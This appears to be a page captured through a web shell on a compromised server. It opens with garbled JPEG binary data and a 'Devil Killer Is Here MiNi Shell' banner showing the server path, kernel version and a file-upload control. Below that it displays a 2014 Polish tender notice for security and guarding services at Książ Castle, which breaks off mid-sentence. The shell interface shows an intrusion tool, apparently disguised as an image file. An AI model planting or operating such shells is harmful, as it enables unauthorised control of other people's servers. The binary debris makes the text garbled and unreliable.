JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141016/343520-N-2014.html

<p class="kh_header"><b>Wałbrzych: Dozorowanie historycznych obiektów i terenów, ochrona mienia, wystaw i 
eksponatów, obsługa ruchu turystycznego, monitorowanie systemu przeciwpo-żarowego, ochrona imprez, roślinności  na terenach administrowanych przez Zamek Książ w Wałbrzychu Spółka z o.o.</b><br>
<b>Numer ogłoszenia: 343520 - 2014; data zamieszczenia: 16.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zamek Książ w Wałbrzychu Spółka z o.o. , ul. Piastów Śląskich 1, 58-306 Wałbrzych, woj. dolnośląskie, tel. 74 6643850, faks 74 6643862.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ksiaz.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dozorowanie historycznych obiektów i terenów, ochrona mienia, wystaw i 
eksponatów, obsługa ruchu turystycznego, monitorowanie systemu przeciwpo-żarowego, ochrona imprez, roślinności  na terenach administrowanych przez Zamek Książ w Wałbrzychu Spółka z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia. Przedmiotem zamówienia jest wykonanie usłu-gi dozorowania  historycznych obiektów i terenów, ochrony mienia, wystaw i eksponatów, obsługi ruchu turystycznego, monitorowania systemu przeciwpo-żarowego, ochrony imprez, roślinności  na terenach administrowanych przez  Zamek Książ w Wałbrzychu Spółka z o.o., na którą składają się następujące usługi:1.1. Całodobowa ochrona mienia oraz monitorowanie systemu przeciwpo-żarowego w ramach której  Zamawiający wymaga, aby Wykonawca  świadczył usługę stałej, bezpośredniej ochrony fizycznej mienia składającego się z history-cznych  budynków i budowli zlokalizowanych na terenie kompleksu zamkowo-parkowego Książ  i Palmiarni w Wałbrzychu, ich pomieszczeń, wyposażenia sta-łego i ruchomego znajdujące-go się w pomieszczeniach oraz terenów na któ-rych obiekty te i budynki są posadowione i będzie polegać na zabezpieczeniu  budynków przed włamaniem, kradzieżą, zniszczeniem mienia oraz działaniem osób trzecich , jak również w sytuacjach bezpośredniego zagrożenia, w tym pożaru, zalania wodą. Przedmiotem umowy objęte są niżej wymienione poste-runki i punkty ochrony:1.1.1.Lokalizacja posterunku nr 1: siedziba Zamawiają-cego w Wałbrzychu 58-306 przy ulicy Piastów Śląskich 1, budynek nr 1(Zamek) kompleksu zamkowo-parkowego Książ (dyżurka ochrony).Posterunek nr 1 - całodobowy, jednoosobowy, stacjonarny zlokalizowany w portierni, wyposażony w monitory systemu monitoringu wizyjnego (5 kamer monitorujących wydzielo-ne sektory w budynku Zamku i wydzielone sektory terenu zewnętrznego), cen-tralkę dozorowo-rejestracyjną dla systemu instalacji hydrantowej w Zamku. Szczegółowe i podstawowe obowiązków pracowników ochrony na tym posteru-nku określono w SIWZ; 1.1.2. Posterunek nr 2 - całodobowy monitoring syste-mu przeciwpożarowego w budynku Zamku Książ.Zamawiający wymaga, aby Wykonawca świadczył usługę całodobowego, bezpośredniego dozoru sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych to znaczy  wizyjnego monitoringu systemu przeciw-pożarowego funkcjonującego w budynku Zamku. Lokalizacja posterunku nr 2 (monitoring ppoż.): siedziba Zamawiającego w Wałbrzychu 58-306 przy ulicy Piastów Śląskich 1, budynek nr 1 (Zamek) kompleksu zamkowo-parkowego Książ, pomieszczenie nr 13.Posterunek nr 2 ( monitoring ppoż) - całodobowy, jednoosobowy, stacjonarny zlokalizowany na parterze w pomieszczeniu nr 13 przylegającym do dyżurki ochrony (posterunek nr 1), wyposażony w monitory systemu przeciwpożarowego funkcjonującego w budynku nr 1 (Zamek). Czujki alarmu przeciwpożarowego zainstalowane we wszystkich pomieszczeniach Zam-ku. Podstawowe i szczegółowe obowiązki pracowników ochrony na tym stano-wisku zawarte zostały w SIWZ. 1.1.3. . Posterunek nr 3 -  stała, całodobowa usługa bezpośredniej ochrony fizycznej,  obejmującej swoim zakresem dozoro-wanie mienia, terenu przedzamcza wraz z zabudowaniami (bud. Nr 2, 3, 4, 5, 6, 7, 8, 9, 10 wraz z parkingami wewnętrznymi hotelowymi) oraz pozostałych terenów leżących w granicach murów obronnych. Lokalizacja posterunek nr 3: siedziba Zamawiającego w Wałbrzychu 58-306 przy ulicy Piastów Śląskich 1, teren przedzamcza obejmujący budynki nr 2, 3, 4, 5, 6, 7, 8, 9, 10 (budynki Hotelu Zamku Książ, budynek garażu, trafostacji, budynki hotelowe dzierżawio-ne, budynki gospodarcze kuźni), parkingi hotelowe wewnętrzne kompleksu zamkowo-parkowego Książ. Posterunek nr 3 - całodobowy, jednoosobowy, zlokalizowany w drewnianej portierni na przedzamczu, obejmuje swoim zakre-sem dozorowanie terenu przedzamcza wraz z zabudowaniami (bud. Nr 2, 3, 4, 5, 6, 7, 8, 9, 10  wraz z parkingami wewnętrznymi) oraz pozostałych terenów leżących w granicach murów obronnych. Szczegółowe i podstawowe obowiązki pracownika ochrony na tym posterunku zawarte zostały w SIWZ. 1.1.4. Poste-runek nr 4 - stałej, całodobowej, bezpośredniej ochrony fizycznej budynku Mauzoleum na terenie kompleksu Zamku Książ W Wałbrzychu.Lokalizacja poste-runku nr 4: siedziba Zamawiającego w Wałbrzychu 58-306 przy ulicy Piastów Śląskich 1, budynek Mauzoleum na terenie kompleksu zamkowo-parkowego Książ (w parku).Posterunek nr 4 - całodobowy , jednoosobowy, stacjonarny zlokalizowany w  drewnianym domku strażnika. Podstawowe i szczegółowe obo-wiązki pracownika ochrony na tym posterunku zawarte zostały w SIWZ. 1.1.5. Posterunek nr 5 -  całodobowa ochrony budynków i budowli oraz mienia w Pal-miarni. Lokalizacja posterunku nr 5 (Palmiarnia): Zespół budynków i budowli Palmiarni  w Wałbrzychu 58-306, przy ulicy Wrocławskiej 158. Posterunek cało-dobowy, jednoosobowy, zlokalizowany  w punkcie sprzedaży biletów  wstępu. Zamawiający wymaga całodobowej, ciągłej ochrony zabytkowego obiektu Pal-miarni, budynków i budowli, roślinności oraz mienia zlokalizowanego w obrębie działek 83/28 i 83/29. Podstawowe i szczegółowe obowiązki pracownika ochro-ny na tym posterunku określono w SIWZ. 1.2. Świadczenie usługi stałej, bezpo-średniej ochrony fizycznej osób i mienia w zakresie obsługi ciągów turysty-cznych, obsługi ruchu turystycznego, ochronie mienia, wystaw i eksponatów na trasach turystycznych Zamku Książ  i w Palmiarni  w Wałbrzychu. W ramach wykonywanych czynności wskazanych w punkcie 1.2., Wykonawca zobowiąza-ny jest do: 1) wystawienia niezbędnej, niżej wymienionej, liczby stanowisk w celu zapewnienia sprawnej obsługi ruchu turystycznego, 2)  bieżącej kontroli w osobowym ruchu turystycznym, 3) ochrony mienia, wystaw i eksponatów zgod-nie z obowiązującymi przepisami dotyczącymi ochrony osób i mienia. Zama-wiający wymaga aby wykonawca w celu zapewnienia sprawnej obsługi ruchu turystycznego  wystawił posterunki bezpośredniej fizycznej ochrony w miejsca-ch: a) PARTER - dwa stanowiska  jednoosobowe w sezonie turystycznym (tj. od 1 kwietnia do 30 września 2015 roku), jedno stanowisko jednoosobowe po se-zonie turystycznym. Stanowisko przy kasach biletowych - formowanie grup zwiedzających. b) I PIĘTRO  i  Sala Konrada -  minimalnie trzy a maksymalnie sześć całorocznych stanowisk obsługi, jedno-osobowych, obejmujących dozo-rem Salę Maksymiliana, Salę Wystawową, Salon Zielony, Salon Biały i Chiński, Salon Gier i Salon Włoski, Salę Konrada, c) KONDYGNACJA MIĘDZY I a II PIĘ-TREM oraz II piętro  - jedno całoroczne stanowisko obsługi, jednoosobowe, obejmujące dozorem Hol Myśliwski i Salę Balową z salami przyległymi do niej,
d) II PIĘTRO - dwa całoroczne stanowiska ochrony, obejmujące dozorem: kory-tarz  przed balkonami Sali Maksymiliana, korytarz Północny, Sale Muzealne  pn. Sekrety.. e) III PIĘTRO - jedno stanowisko ochrony  tylko w sezonie turystycz-nym (tj. od 1 kwietnia do 30 września 2015 roku.; f) TARASY ZAMKOWE (czyn-ne tylko w sezonie turystycznym): cztery  stanowiska obsługi, jednoosobowe w sezonie turystycznym (tj. od 1 kwietnia do 30 września 2015 roku), g) PAL-MIARNIA - jedno stanowisko ochrony tylko w sezonie turystycznym (tj. od 1 kwietnia do 30 września 2015 roku). Uwaga:  Realizacja zadania opisanego w punkcie 1.2. podpunkt  b)  dla maksymalnej ilości stanowisk ochrony ( sześć) nastąpi z datą, gdy  zakończone zostaną prace związane z  uruchomieniem muzealnej części wystawienniczej w tym sektorze Zamku. Powyższe nie zwal-nia Wykonawcy z obowiązku uwzględnienia ceny tej części przedmiotu zamó-wienia w ofercie przetargowej dla maksymalnej ilości stanowisk pracy. 1.2.1. Usługi wymienione w punkcie 1.2. mają być wykonywane w terminach i wyma-ganej przez Zamawiającego ilości dla stanowiskach: a) W okresie 1.12.2014 - 31.03.2015: (poza sezonem turystycznym) - w dni robocze  od 10.00 do 16.00 - maksymalnie 10 stanowisk,- w soboty/ niedziele od 10.00 do 17.00 - maksy-malnie. 10 stanowisk, b)W okresie 1.04.2015- 30.09.2015: (sezon turystyczny)
- w dni robocze  od 10.00 do 18.00 - 17 stanowisk,- w soboty/ niedziele od 10.00 do 19.00 - 17 stanowisk, c) W okresie 1.10.2015 - 30.11.2015: (poza sezonem turystycznym),- w dni robocze  od 10.00 do 16.00 - 10 stanowisk
- w soboty/ niedziele od 10.00 do 17.00 -  10 stanowisk. UWGA: Zamek nie-czynny dla  zwiedzających w dniach : 25 grudnia 2014 (pierwszy dzień Świąt Bożego Narodzenia), 1 stycznia 2015 (Nowy Rok), 05 kwietnia (pierwszy dzień Świąt Wielkanocnych w 2015), 01 listopada w 2015r. (Wszystkich Świętych).  W tych dniach usługi o który mowa w punkcie  1.2 powyżej nie będą świadczo-ne. 1.2.2.Do podstawowych obowiązków pracowników ochrony wykonawcy w zakresie opisanym w części 1.2. należy strzeżenie, ochrona mienia i wyposażę-nia obiektu poprzez dokonywanie okresowych obchodów poszczególnych sekto-rów i sal . Szczegółowy sposobu świadczenia  usług ochrony w zakresie ochrony ciągów turystycznych i obsługi ruchu turystycznego zawarty został w SIWZ
Uwaga: Zmiana terminu sprowadzenia nowych ekspozycji muzealnych przezna-czonych na doposażenie sal na I piętrze spowodować może, że w pierwszym okresie świadczenia usług ochrony (grudzień 2014/ styczeń 2015) zajdzie ko-nieczność zmniejszenia liczby stanowisk ochrony w Zamku o maksymalnie 3 osoby. 1.3. Świadczenie dodatkowych usług bezpośredniej fizycznej ochrony  osób  i mienia, parkingów, imprez  na terenach administrowanych przez Zama-wiającego w zakresie objętym szacowaną dodatkową  ilością  20.000 godzin, obejmować będzie usługi w zakresie: 1. Dodatkowego posterunku całodobowej  ochrony fizycznej lub wzmocnienie istniejącego posterunku w zakresie ustalo-nym odrębnym pisemnym zleceniem  wystawionym przez Zamawiającego; 2. Dodatkowej ochrony w zakresie ochrony i obsługi ruchu turystycznego poprzez wzmocnienie istniejącego posterunku lub utworzenie nowego. Zakres prac usta-lony zostanie w odrębnym pisemnym zleceniu wystawionym przez Zamawiają-cego; 3. Dodatkowej ochrony imprez organizowanych na terenach administro-wanych przez Zamawiającego, w tym imprez okazjonalnych, festynów, festiwa-li lub imprez sportowo-rekreacyjnych. Zakres prac ustalony zostanie w odrę-bnym pisemnym zleceniu wystawionym przez Zamawiającego. Zamawiający zawiadomi wykonawcę o dodatkowym zleceniu na minimum 3 dni  przed  plano-waną imprezą lub uruchomieniem dodatkowego posterunku.2. Do obowiązków Wykonawcy należy również: 2.1. Wyposażenie pracowników ochrony w ubiór służbowy stosowny do charakteru świadczonej usługi w obiektach zabytkowych oraz  warunków klimatycznych. 2.2.Wyposażenie pracowników ochrony w iden-tyfikatory zaopatrzone w numer służbowy i zdjęcie  pracownika. 2.3. Wyposaże-nie pracowników w niezbędne środki łączności umożliwiające bezpośrednie ko-munikowanie się pracowników ochrony, wezwanie grupy interwencyjnej czy służb specjalistycznych.2.4. W każdym czasie, gdy sytuacja będzie tego wyma-gała, Wykonawca zapewni niezwłoczny przyjazd własnej grupy interwencyjnej i podjęcie przez nią czynności przewidzianych prawem w czasie nie dłuższym niż 1 (jedna) godzina od momentu wezwania. Wezwania grupy interwencyjnej do-konuje pracownik Wykonawcy oceniający realne możliwości własnej interwencji w konkretnym zdarzeniu, oceny stopnia zagrożenia  dla osób i mienia lub upra-wniony  pracownik Zamawiającego. Zamawiający nie ponosi dodatkowych kosz-tów przyjazdu i interwencji  takiej grupy. 2.5. Wykonawca  zobowiązany będzie do prowadzenia książki dyżurów, do której pracownicy Wykonawcy będą wpisy-wać wszelkie spostrzeżenia, uwagi oraz istotne wydarzenia związane ze świad-czeniem usługi ochrony mienia Zamawiającego.  Zamawiającemu przysługuje prawo wglądu do książki dyżurów. 2.6. Wykonawca w terminie do 5 dni licząc od daty podpisania umowy opracuje i przedstawi Zamawiającemu celem akcep-tacji Plan ochrony. 3. Odpowiedzialność Wykonawcy: 1.Wykonawca odpowiada na warunkach określonych w Kodeksie Cywilnym oraz umowie, której projekt stanowi załącznik nr 7 do SIWZ, za szkody w dozorowanych obiektach oraz na chronionym terenie, wynikłe  w szczególności z dewastacji, kradzieży, kradzie-ży z włamaniem, wyrządzone Zamawiającemu przez pracowników Wykonawcy lub osoby trzecie,  powstałe w związku z nienależytym wykonaniem przedmiotu umowy przez Wykonawcę. 2. W razie powstania szkody, o której mowa w ust. 1 powyżej, Zamawiający powiadamia niezwłocznie Wykonawcę o zaistniałej szkodzie, nie później niż w pierwszym dniu roboczym po jej stwierdzeniu oraz podaje przybliżoną wartość szkody. 3.	Wykonawca ma prawo wglądu do doku-mentacji finansowo-księgowej Zamawiającego dotyczącej powstałej szkody, w części istotnej dla oceny zgłoszonego roszczenia. 4. Wysokość odszkodowania ustala się wg. cen aktualnych na dzień wyrządzenia szkody. 5. Naprawy będące następstwem niewykonania lub nienależytego wykonania umowy przez Wyko-nawcę dokonywane będą na koszt Wykonawcy. Wartość napraw ustala się wg. aktualnych na dzień naprawienia szkody cen usług, niezbędnych do naprawie-nia wyrządzonej szkody. 6. Postanowienia ust. 1 - 5 nie wyłączają innych rosz-czeń Zamawiającego wynikających z niewykonania lub nienależytego wykona-nia niniejszej umowy - dochodzonych na zasadach ogólnych. 7. Wartość mają-tku użytkowanego przez Zamawiającego ( własnego, dzierżawionego, ekspozy-cji stałych i  czasowych , eksponatów botanicznych, nasadzeń w uprawie szklar-niowej i na otwartych terenach) na tere-nie objętym niniejszym postępowa-niem ustalana będzie na podstawie ewidencji  księgowej majątku prowadzonej przez Zamawiającego. 4. Zamawiający  w rozliczeniu z Wykonawcą dokona zap-łaty tylko za godziny faktycznie przepracowane przez pracowników Wykonaw-cy. Obowiązki i dodatkowe wymagania zawarte są w projekcie umowy dołączo-nym do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 92.52.20.00-6, 98.34.11.20-2, 98.34.11.40-8, 92.52.12.00-1, 79.71.00.00-4, 79.71.50.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca składający ofertę na realizację zadania zobowiązany jest do wniesienia wadium w wysokości 18.000 zł (słownie: osiemnaście tysięcy zło-tych) nie później niż dnia 27 października 2014r. do godz. 1000. Wadium nale-ży wnieść na konto Zamawiającego w BZ WBK S.A. VI Oddział w Wałbrzychu, numer rachunku: 35 1500 1764 1217 6001 6040 0000  przelewem z zaznacze-niem nazwy postępowania: Dozorowanie historycznych  obiektów i terenów, ochrona mienia, wystaw i eksponatów, obsługa ruchu turystycznego, monitoro-wanie systemu przeciwpożarowego, ochrona imprez, roślinności  na terenach administrowanych przez Zamek Książ w Wałbrzychu Spółka z o.o. 2.1. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uwa-żał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiające-go potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. W tym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę nie jest warunkiem wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez wykonawcę. 2.2. Wadium może być wnoszone również w innych formach zgodnie z art. 45 ust. 6 Prawo zamówień publicznych w siedzibie Zamawiającego w Wałbrzychu 58-306 ulica Piastów  Śląskich 1, pokój nr 18/1(kasa główna). Kopię dokumentu po-twierdzającego wniesienie wadium w innych formach należy dołączyć do oferty.
Wadium musi zabezpieczać złożoną ofertę przez cały okres związania ofertą tj. 30 dni, licząc od dnia upływu terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć odpowiednie dokumenty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem. Zamawiający wymaga, aby Wykonaw-ca złożył oświadczenie o spełnieniu wymagań ustawowych zgodne w treści ze wzorem stanowiącym Załącznik nr 3 do SIWZ oraz złożył aktualną koncesję wydaną przez Ministra właściwego do spraw wewnętrznych zgodnie z ustawą o ochronie osób i mienia na prowadzenie działalności gospodarczej w zakresie ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Dz. U. z 2005r. nr 145 poz. 1221 z późn. zm.).Zamawiający uzna warunek za spełniony na podsta-wie złożonego przez Wykonawcę oświadczenia w tym zakresie i przedłożonych dokumentów. Ocena spełnienia warunku dokonana zostanie zgodnie z regułą: spełnia warunek - nie spełnia  warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć odpowiednie dokumenty w formie oryginału lub kserokopii poś-wiadczonej za zgodność z oryginałem. W przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie zamówienia, oceniane będą łącznie posiada-na wiedza i doświadczenie.1.2.1. Zamawiający wymaga, aby Wykonaw-ca złożył oświadczenie o spełnieniu wymagań ustawowych zgodne w treści ze wzorem stanowiącym Załącznik nr 3  do SIWZ oraz złożył wykaz wykonanych lub wykonywanych, usługi według wzoru stanowiącego Załącznik nr 5, w okre-sie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie. W wykazanych w załączni-ku nr 5 usługach minimum jedna usługa dotyczyć ma bezpośredniej fizycznej ochrony osób i mienia, terenów, wystaw, muzealnych sal wystawienniczych, dozoru historycznych obiektów wpisanych do rejestru zabytków oraz całoro-cznej obsługi ruchu turystycznego w takich obiektach. W wykazie (Załącznik nr 5) należy określić rodzaj przedmiot zamówienia, daty wykonania lub wykonywa-nia usług,  nazwy podmiotów - zamawiających,  numerów pod którymi obiekty  wpisane zostały do rejestru zabytków. 1.2.2. Wykonawca zobowiązany jest dołączyć do oferty dowody - poświadczenia (dotyczące najważniejszych usług), określające czy usługi te zostały wykonane lub są wykonywane w sposób nale-żyty. Dowodami takimi są: a) poświadczenie wydane nie wcześniej niż 3 miesią-ce przed upływem terminu składania ofert, b) oświadczenie Wykonawcy zawie-rające uzasadnienie braku możliwości uzyskania poświadczenia. Oświadczenie, o którym mowa w pkt. b) składa Wykonawca tylko i wyłącznie wtedy, gdy z przyczyn o obiektywnym charakterze nie może uzyskać poświadczenia. 1.2.3. W przypadku, gdy w Załączniku nr 5 Wykonawca wskazał Zamawiającego jako podmiot na rzecz którego wykonywał wcześniej lub wykonuje wskazane w wy-kazie usługi, nie ma obowiązku przedkładania dowodów, o których mowa  w punkcie 1.2.2. 1.2.4. Zamawiający uzna warunek za spełniony, jeżeli wykonaw-ca wykaże w załączniku nr 5 wykonane lub wykonywane usługi tylko z zakresu ochrony osób i mienie w obiektach wpisanych do rejestru zabytków i odrębnie z zakresu obsługi ruchu turystycznego, ochrony osób i mienia w obiektach wpisa-nych do rejestru zabytków. W takim przypadku Zamawiający oceni łącznie po-siadaną wiedzę i doświadczenie w oparciu o złożone oświadczenia i dowody - poświadczenia. Zamawiający uzna warunek za spełniony na podstawie złożone-go przez Wykonawcę oświadczenia w tym zakresie i przedłożonych dokumen-tów. Ocena spełnienia warunku dokonana zostanie zgodnie z regułą: spełnia warunek - nie spełnia  warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca złożył oświadczenie o spełnieniu wyma-gań ustawowych zgodne w treści ze wzorem stanowiącym Załącznik nr 3. Za-mawiający nie stawia szczególnych wymagań w tym zakresie. Ocena spełnienia warunku dokonana zostanie zgodnie z regułą: spełnia warunek - nie spełnia  warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca złożył oświadczenie o spełnieniu wyma-gań ustawowych zgodne w treści ze wzorem stanowiącym Załącznik nr 3 oraz przedłożył odpowiednie dokumenty   w formie oryginału lub kserokopii poświad-czonej za zgodność z oryginałem w celu potwierdzenia spełnienia warunku tj. 
złożył wykaz osób, które będą uczestniczyć w wykonaniu zamówienia odpowie-dzialnych za nadzór i kontrolę pracy pracowników ochrony fizycznej stałej i do-raźnej oraz dozorujących sygnały przesyłane, gromadzone i przetwarzane w elektronicznych urządzeniach i systemach alarmowych oraz wykonujących bez-pośrednio czynności związane  z fizyczna ochroną osób i mienia według  wzoru stanowiącego Załącznik nr 6 do SIWZ. W wykazie (załączniku nr 6) należy po-dać informacje na temat  kwalifikacji zawodowych, doświadczenia i wykształce-nia niezbędnych do wykonania przedmiotu zamówienia osób podanych w wyka-zie oraz informacje o podstawie dysponowania tymi osobami i/lub pisemne zo-bowiązania innych podmiotów do oddania do dyspozycji Wykonawcy osób zdol-nych do wykonania zamówienia.Do wykazu należy dołączyć odpowiednie doku-menty w formie kserokopii poświadczonej za zgodność z oryginałem, tj:- po-twierdzenie o wpisie na listę kwalifikowanych pracowników ochrony fizycznej lub potwierdzenie o wpisie na listę kwalifikowanych pracowników  